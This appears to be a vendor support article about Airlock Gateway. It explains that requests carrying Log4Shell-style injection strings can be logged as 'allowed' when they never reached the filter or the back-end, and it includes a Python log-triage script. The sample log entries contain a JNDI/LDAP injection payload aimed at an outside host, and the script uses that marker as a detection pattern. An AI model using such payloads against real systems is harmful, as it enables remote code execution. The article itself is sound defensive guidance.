
Injections like log4shell that might have passed the Deny Rules filters

Description: 

Airlock Gateway logs certain requests that carry attack strings in the HTTP path or in other fields with the action "allowed" if the request could not be completed (e.g. it was aborted by the client during transmission). Below is an example log entry for such a request.

...
"entry_url": "https://gateway.airlock.com/${jndi:ldap:/124.150.96.246:1389/Exploit}",
"entry_path": "/${jndi:ldap:/124.150.96.246:1389:1389/Exploit}"
...
"action": "allowed",
...

"backend_url": "<n/a>",
...

Note that the "backend_url" field is set to "<n/a>" and that the "time_filter" field is not set at all, which means that the request was never processed by the filter engine (Deny Rules). Such requests are NOT forwarded to the back-end and are therefore not a security risk.
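A triage check built on the two indicators described above, as an added example that is not part of the Airlock product or of this article's original text. It assumes the log is available as one flat JSON object per line using the field names from the excerpt; the sample entries and host names are constructed.

```python
import json

MARKER = "${jndi:"  # attack string from the article's example entry

# Constructed sample entries; flat one-object-per-line layout is an assumption.
SAMPLE_LOG = """\
{"entry_path": "/${jndi:ldap://192.0.2.10:1389/Exploit}", "action": "allowed", "backend_url": "<n/a>"}
{"entry_path": "/${jndi:ldap://192.0.2.10:1389/Exploit}", "action": "allowed", "backend_url": "https://backend.example/app", "time_filter": 3}
{"entry_path": "/index.html", "action": "allowed", "backend_url": "https://backend.example/index.html", "time_filter": 1}
not-json
"""


def has_marker(entry):
    """True if any string field of the entry contains the attack marker."""
    return any(MARKER in v.lower() for v in entry.values() if isinstance(v, str))


def classify(entry):
    """Return 'ignore', 'not_forwarded' or 'review' for one parsed log entry."""
    if entry.get("action") != "allowed" or not has_marker(entry):
        return "ignore"
    # Both indicators from the article must hold: the filter engine never ran
    # (no time_filter field) and no back-end was contacted (backend_url "<n/a>").
    if "time_filter" not in entry and entry.get("backend_url") == "<n/a>":
        return "not_forwarded"
    # Allowed, carries the marker, and was filtered or forwarded: needs a human.
    return "review"


def triage(log_text):
    """Classify every non-empty line; unparsable lines are reported, not dropped."""
    verdicts = []
    for line in filter(None, map(str.strip, log_text.splitlines())):
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            verdicts.append("unparsed")
            continue
        verdicts.append(classify(entry) if isinstance(entry, dict) else "unparsed")
    return verdicts


if __name__ == "__main__":
    for verdict in triage(SAMPLE_LOG):
        print(verdict)
```

Only entries classified as "review" need a closer look; "not_forwarded" entries match the harmless pattern this article describes.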

 

Workaround: 

No action required.
